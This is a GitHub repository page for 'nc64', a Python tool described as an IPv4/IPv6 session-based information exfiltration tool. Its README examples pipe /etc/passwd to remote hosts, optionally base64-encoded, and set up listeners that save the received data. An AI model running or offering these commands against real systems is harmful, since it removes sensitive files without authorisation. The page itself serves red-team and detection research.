Skip to content
/ nc64 Public

IPv6 and IPv4 session based information exfiltration tool

License

Notifications You must be signed in to change notification settings

lockout/nc64

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

33 Commits
 
 
 
 
 
 

Repository files navigation

nc64

IPv6 and IPv4 session based information exfiltration tool

Examples:

cat /etc/passwd | python3 nc64.py -h4 192.168.10.10 -h6 2a02:1010:12aa::11

python3 nc64.py -l > out

cat /etc/passwd | python3 nc64.py -i wlan0 -p 4444 -h4 192.168.10.10 -h6 2a02:1010:12aa::11

python3 nc64.py -l -i eth1 -p 4444 > out

cat /etc/passwd | python3 nc64.py -h4 192.168.10.10 -h6 2a02:1010:12aa::11 -b64 -T

python3 nc64.py -l -b64 > out

About

IPv6 and IPv4 session based information exfiltration tool

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages